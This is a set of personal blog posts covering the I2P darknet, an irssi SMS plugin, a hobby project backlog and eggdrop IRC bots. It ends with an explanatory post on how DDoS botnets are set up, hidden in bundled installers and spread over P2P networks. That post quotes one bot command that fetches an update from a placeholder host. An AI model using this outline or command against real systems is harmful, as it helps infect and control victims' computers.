I2P 101 – Inside the Invisible Internet

This article was originally written for and published at N-O-D-E on May 1st, 2016. It has been posted here for safe keeping.

I2P 101 – INSIDE THE INVISIBLE INTERNET

The Invisible Internet Project (more commonly known as I2P) is an older, traditional darknet built from the ground up with privacy and security in mind. As with all darknets, accessing an I2P site or service is not as simple as firing a request off from your web browser as you would with any site on the traditional Internet (the clearnet). I2P is only accessible if you are running software built to access it. If you try to access an I2P service without doing your homework, you won’t be able to get anywhere. Instead of creating all new physical networking infrastructure, I2P builds upon the existing Internet to take care of physical connections between machines, creating what is known as an overlay network. This is similar to the concept of a virtual private network (VPN) wherein computers can communicate with one another comfortably, as though they were on a local area network, even though they may be thousands of miles apart.

2nzxPzu

INTRODUCTION

I2P was first released in early 2003 (only a few months after the initial release of Tor), and was designed as a communication layer for existing Internet services such as HTTP, IRC, email, etc. Unlike the clearnet, I2P focuses on anonymity and peer-to-peer communications, relying on a distributed architecture model. Unlike Tor which is based around navigating the clearnet through the Tor network, I2P’s goal from the start was to create a destination network and was developed as such. Here, we see that the focus is on community and anonymity within it as opposed to anonymity when using the clearnet.

ROUTERS, INPROXIES & OUTPROXIES

When you connect to I2P, you are automatically set up to be a router. If you are a router, you exist as a node on the network and participate in directing or relaying the flow of data. As long as you are on the network, you are always playing a part in keeping the traffic flowing. Other users may choose to configure their nodes as inproxies. Think of an inproxy as a way to get to an I2P service from the clearnet. For example, if you wanted to visit an eepsite (An anonymous site hosted on I2P, designated by a .i2p TLD) but we’re not on I2P, you could visit an inproxy through the clearnet to provide you access. Other users may choose to operate outproxies. An outproxy is essentially an exit node. If you are on I2P and want to visit a clearnet site or service, your traffic is routed through an outproxy to get out of the network.

ADVANTAGES

There are numerous advantages to using I2P over another darknet such as Tor depending upon the needs of the user. With I2P, we see a strong focus on the anonymity of connections as all I2P tunnels are unidirectional. This means that separate lines of communication are opened for sending and receiving data. Further, tunnels are short-lived, decreasing the amount of information an attacker or eavesdropper could have access to. We also see differences in routing as I2P uses packet switching as opposed to circuit switching. In packet switching routing, messages are load balanced among multiple peers to get to the destination instead of a single route typical of circuit switching. In this scenario, I2P sees all peers participating in routing. I2P also implements distributed dissemination of network information. Peer information is dynamically and automatically shared across nodes instead of living on a centralized server. Additionally, we also see low overhead for running a router because every node is a router instead of a low percentage of those who choose to set one up.

GARLIC ROUTING

I2P implements garlic routing as opposed to the more well known onion routing. Both garlic routing and onion routing rely on the technique of layered encryption. On the network, traffic flows through a series of peers on the way to its final destination. Messages are encrypted multiple times by the originator using the peers’ public keys. When the message is sent out on the path and decrypted by the proper corresponding peer in the sequence, only enough information to pass the message to the next node is exposed until the message reaches its destination where the original message and routing instructions are revealed. The initial encrypted message is layered and resembles an onion that has its layers peeled back on transit.

Garlic routing extends this concept by grouping messages together. Multiple messages referred to as “bulbs” are bound together, each with its own routing instructions. This bundle is then layered just like with onion routing and sent off to peers on the way to the destination. There is no set size for how many messages are included in one bundle, providing another level of complexity in message delivery.

INSIDE THE NETWORK

Hundreds of sites and services exist for use within the I2P network, completely operated by the community. For example, Irc2P is the premier IRC network for chat. We see search engines like eepSites & Epsilon, and torrent trackers like PaTracker. Social networks like Id3nt (for microblogging) and Visibility (for publishing) are also abundant. If you can think of a service that can run on the network, it may already be operational.

FUTURE

I2P remains in active development with many releases per year and continues to be popular within its community. While I2P is not as popular as other darknets such as Tor, it remains to be a staple of alternative networks and is often praised for its innovative concepts.Though I2P does not focus on anonymous use of the clearnet, it is seeing active use for both peer-to-peer communication and file-sharing services.

CONCLUSION

While many may view I2P as just another darknet, it has many interesting features that aren’t readily available or implemented on other networks. Due to the community and regular updates, there is no reason to think that I2P will be going anywhere anytime soon and will only continue to grow with more awareness and support.

Over time, more and more people have embraced alternative networks and we are bound to see more usage on the horizon. However one of the points I2P maintainers express is that the network’s small size and limited adoption may be helpful at this point in time. I2P is not as prominent in the public’s field of view, possibly protecting it from negative publicity and potential attackers.

Whether or not I2P will keep hold of its core community or expand and change with time is unknown, but for now it proves to be a unique darknet implementation with a lot of activity.

SOURCES

https://geti2p.net/en/comparison/tor
https://www.ivpn.net/privacy-guides/an-introduction-to-tor-vs-i2p
https://geti2p.net/en/about/intro
https://geti2p.net/en/docs/how/garlic-routing

––
BY MIKE DANK (@FAMICOMAN)

 

irssi-hilighttxt.pl – An irssi Plugin That SMS Messages You On Hilight

A few months ago after configuring irssi with all the IRC channels I wanted, I ran into the problem of being late to a conversation. Every few days I would check my channels only to see people reaching out to me when I wasn’t around. Sometimes I was able to ping someone to talk, other times the person left and never came back.

I had been using the faithful hilightwin.pl plugin to put all my hilights in a separate window I could monitor. I figured that with my limited knowledge of perl I could rig up something to send me an SMS text message instead of writing the hilight line to a different window in irssi where i may not get to it in time.

Using TextBelt’s free API, I was able to call a curl command from inside perl to send the message triggering my hilight to my mobile phone. It isn’t perfect, as there is some garbled text at the front of the message, but I get the message quickly and I can see not only who sends it but also the channel they are in.

Sensible text messages delivered!

Sensible text messages delivered!

I’ve put the code up on GitHub for anyone to use or improve upon. TextBelt’s API is a little limited in how many messages you can receive in a short period of time (as it should be to prevent abuse) and doesn’t support many carriers outside of the USA, so there is definitely room for improvement if another suitable API was found.

Check it out and let me know what you think!

 

The Summer Backlog

Every Summer I speculate that I’m going to have an unbelievable amount free time. It will always be so fantastic and freeing. I’ll be done school, working a stress-free job, and there will be so much unscheduled time that I’ll just get bored and come up with hundreds of new tasks for myself.

This never happens.

Well, the having-free-time-thing never happens but I do take on new activities anyway. After enough time, I end up with a bunch of things I’ve been meaning to do, and work on them impulsively at sporadic intervals. Everything moves forward, slow and steady, but in an agonizing and chaotic fashion.

I do make time for my projects, but the available time is fluctuating as the years go by. When I started these projects all I had was time and energy, but no money. Now, I seem to find myself with a modest amount of money and energy, but no time. Eventually, I’m doomed to have time and money, but no energy. This is the vicious cycle, and here I find myself in the second stage.

Without organization, every project falls on its face. I’m a big proponent of organization, especially when I have so much going on. After a while, you just need to keep track and work smarter (or risk meeting some men who want to put you in a straitjacket). Below, I’ve outlined (to the best of my ability) the various projects I’m working on, and where they need to go next. Hopefully this not only helps me stay on track but also gives you something to yell at me about the next time you see me.

Obsoleet
I’ve actually had most of an episode filmed for a long time by this point. The only problem that I faced was the audio cut out at the end of one of the shots. After I redo it, which I wanted to do anyway, the footage should be mostly set to go into editing. Additionally, I’d like to film a little skit for the intro if I can manage it. Editing usually doesn’t take a whole lot of time, though I do want to try out some new software and I have to cut a brand new introduction. High definition video also proves to be more of a hassle and take some more (read unplanned) time.

Anarchivism
This one is going along pretty well, especially recently. On the scanning side of things, I have plenty of stuff coming in but not a lot going up. The scanner I have is awful when it comes down to conducting magazine scans and I’ll have to look for something beefier before going full tilt on my library. As an aside, I’ve more or less created the most complete wiki of hacker magazines complete with information on them as far as I can tell. With my current rig, I can pump out some more Blacklisted! 411 issues without much hesitation.

Going after Revision3 has slowed a little, but I can get back into it with some one-liners soon. Getting to other odds and ends comes and goes as I find them. The only section that could have hours poured into it is the hacker con category. The videos I find not only have different ways of being obtained but also get updated with a new crop annually, so everything is constantly in flux. I’m trying to hunt down some of the more difficult stuff as well as fill in actual information about the conferences. If you want to help out, please do.

TechTat
This one is more or less dead due to lack of interest. While it was cool having a collaboration site for retro tech, it lost its luster after a few months. I considered turning TechTat into an audio podcast but I’m not sure how that would turn out. I’m certain I can find some use for the concept.

ChannelEM
ChannelEM keeps trucking on, but is prone to frequent crashing. It does seem to get more stable after software updates, but still ultimately hangs. I want to take a look at the scripting done to run the station and see if I can put in any fail-safes to stop the crashing. CEM also needs a rotation update with any new episodes. Further, the idea of getting new shows to join up is a bit fruitless now, but the site does well as it stands. For no real reason at all, I’d like to see if I can add on to the existing scripts and create a JSON API with scheduling information.

Moonlit has also been working on some very interesting video projects that I’d like to integrate which would completely change the look and feel of both the site and the content.

Raunchy Taco
More or less in a standstill. The stability fluctuates and there isn’t that much going on there anyway. The IRC server is really only kept up if Ethan, Pat, and myself need a place to chat. For a network that has been off-and-on for 6-7 years, we have empty periods like this all the time. I’d like to just keep it up if I can.

The IPTV Archive
More or less in waiting. I put up a hefty amount of content, and then ultimately mirrored it to Internet Archive where it can live forever. If I had the time, I’d spend it doing more detective work for the missing shows- there is always more detective work to do. There are probably a half dozen more smaller shows I could throw up at some point but nothing too pressing.

Additionally, when I started the site I used Blip because it had (arguably) the best quality at the time. Now, YouTube has eclipsed it. There was a bit of panic a few months back about some Blip channels being closed down for no reason and I have to entertain the idea that this could happen to me. If that happens, the whole library would likely need to be moved to YouTube. A big move, but likely a nice one for the content.

Moreover, I’ve also considered moving the content over to Anarchivism as it would be a much more flexible platform.

House Keeping and Solo Projects
I enjoy writing and I’d to do more of it. Besides just being more active here, I’d like to get back into writing for other outlets. I’m thinking of more for The New Tech, and another for my local 2600 group. I’ve also been playing around with Medium (I like the concept but it still might be pretentious dribble) and would like to publish another article through it. I’m looking into 2-3 print publications as well if I can come up with the right topics and go into those pieces with the right energy.

Aside from my web work, I have a bunch of little, lower-profile things going on that I need to get out of the way.

I recently got a display for my Apple G5, so I can let it run as a capture PC for video transfers. I already have an ADVC box hooked up and the machine captures great… but it needs a monitor hooked up to run. Then, I can do more video transfers which can ultimately pop up in other places (Maybe a found footage section on Anarchivism).

I want to set up a dedicated headless Linux server for staging web projects amongst other things. I might also have it just run wget scripts all day or some custom web crawlers or who knows what else.

I have an old cocktail arcade cabinet that needs some love. If the original electronics are beyond repair, it would be nice to outfit the cab with new hardware and set up a MAME machine.

More Raspberry Pi projects would be nice. I like having the Incredible Pi set up as a PBX but I feel like I could do more with it. I have another Pi set up as a media center that I use often. I’m currently on setting up a Bitcoin mining rig with another and still have many more ideas. Raspberry Pi cluster? Telnet BBS? BBS hooked into the PBX? The possibilities are endless.

Paranoia kicks in with regard to my data. I have a dozen or so terabytes worth and I need to clean data off of old drives, sort it, duplicate it, and duplicate the data that’s already there. To make matters worse, I’m constantly downloading more.

A CJDNS Meshnet node has also been in the works for a long time. I tried to set up my first one on a PogoPlug and while I eventually got the software to compile, I couldn’t connect to anybody. It may be time for another try, and possibly on a “normal” box before adapting it to the PogoPlug.

I’m experimenting with a few more programming languages and development environments. Recently, I’ve looked into running some Go, and am learning a great deal of JavaScript. I’d like to look into C# and also play with the Unity engine. Aside from these, I’m reasonably proficient at Android development and might be tying this in with another project of a friend’s.

And the list goes on.

 

There’s a lot of things here- a hell of a lot of things. I’d be lying if I said that there weren’t going to be even more. Hopefully, as I now have a nice little outline, I’ll be able to zero-in my focus and get some work done.

In the meantime, sit back and enjoy the show.

 

Dropping Eggs

So last night, while doing nothing, I decided to full around with eggdrop irc bots. I specifically used Windrop to run on my desktop for easy testing and whatnot, but one day I hope to toss this thing on a nix shell and get it off a personal pc.

The config file was daunting. This wasn’t the first time I made one of these bots, but since I had originally, the config base file has been altered somewhat, and is far more complex. After I partly configured it, there was the problems of commenting out all the kill commands that were put in it to make sure you went through the entire file thoroughly. Needless to say, I didn’t, and probably wasted more time looking for those damn lines then it would have taken to just read the entire thing. Then there was the problem that the bot worked, but it would flip out when opped and do crazy things to the channel and people. I couldn’t fix this without reinstalling the bot, and the torment continued.

After maybe seven re-edits, the thing became stable enough to op, and utilized some key features. TCL scripts add so much functionality to these bots I wonder why anyone would use them for anything else. I mean, I can see these bots back in the day used in place for various services, but now, they are just kinda knick-knacks. TCL scripts allow regular programmers to go off and create bot code without modifying any key files. These scripts are add-ons, or modules if you will.

So now, I have all these scripts on the bot. Weather, horoscopes, seen commands, etc. It all functions well, six hours after starting. The possibly best feature I integrated into this bot is the ability to read RSS. I now have a use for these feeds I have been compiling. The beauty is, the bot will check the forums, and the rest of the site every half an hour, If something in the feed is new, the bot will announce it to the channel. Refreshing the pages waiting to see updates becomes obsolete.

 

Botnets

So a little bit ago, must have been last year judging now, I was into what some call “Botnet Hunting”. As in, I would go and search for active malicious botnets, pretend to be a bot, connect, and wait out on the server to see what was going on and what information I could gather.

To understand what I was doing, there is first the concept of what a botnet is and consists of. I will specifically be talking of DDoS botnets. Every botnet starts with a person, or botnet herder. The bot herder starts by setting up an IRC server. IRC is an acronym for Internet Relay Chat, a fairly common messaging protocol based around chat on servers, and networks of servers (Such as the elcycle chat). Think chatrooms, but with much more control and capability. So, the bot herder sets up a server and configures it to not be picked up by any IRC indexing services that could expose the server to the general public in any way. Once the server is setup, the bot herder acquires a (usually free) DNS mask. The DNS mask will take the server’s Ip (internet protocol) address and give it something similar to a domain name for connection. Free ones are usually chosen from services such as No-Ip or DynDNS and are used in a temporary fashion. Nothing of the bot herder’s personal information is left with the service, because they are free.

Next, the bot herder works on the bot code. Commonly, sources are taken and modified to the herder’s liking, but sometimes these bot codes are made from scratch. Common bot scripts are created and compiled in C++ though I have seen some in other languages. The purpose of this code is to connect the victim’s machine to the irc server the bot herder had set up, and assign it a nickname based on the OS of the infected computer, as well as a number (Either random or based on the victim’s location, for example a bot nick could be “XP|73590257”). This bot code is very lightweight, designed to hide from anti-virus programs, set to run every time the computer restarts, and embedded into the registry. It would not be a surprise if you had one of these bots infecting you with no knowledge.

After the bot code is compiled into an executable ( a .exe file). The malicious file is then usually bound to another legit executable. For example, this bot file could be hidden within a Firefox installer and be launched covertly when you try to install firefox. Because of the design, you would be unaware the bot code was even being run. The binders that combine the executables are also easily found and used. Some of the programs that bot herders use come with Windows distros and are expected to be used to make install packages for mass updates.

The hardest step is distribution of the infected file. Thankfully, there are many unintelligent internet users who will blindly download and install anything as long as they think it will do what they desire. Consider releasing this application on a P2P network (Limewire, Kazaa) with a bogus name and having victims willingly download.

Once they download and run the file, that’s all it takes. The bot infects the computer, hides itself, covers its tracks, and then connects to the IRC server. Sometimes, these bots are a bit more sophisticated and can contain a RAT (Remote Access Trojan). This bot herder could gain full control of the victim’s machine, and take things like stored internet logs and credit card numbers, as well as send a copy of itself to everyone in the computer’s email address book.

Once on the IRC server, the bot joins a channel (room) and waits. The bot herder then goes to this room whenever he/she pleases and takes controls of the bots using several commands (these commands usually start with a period, for example “.upgrade http://xxxxx.com/botupdatefilename.xxx”). The main purpose of these bots is Distributed Denial of Service attacks on servers. The bot herder will issue a command to all the bots and tell them to all ping a single server. The amount of ping the server gets is too great, and causes the server to lock up and go offline. The more bots there are, the quicker this will happen. Some botnets have been found to have populations in the area of hundreds of thousands and could render a server useless quickly.

The bot herder does not always restrict this botnet to self-use, and can offer services to other groups in exchange for information, stolen passwords, money, etc. Botnets have also been used recently against various websites that deal with scientology.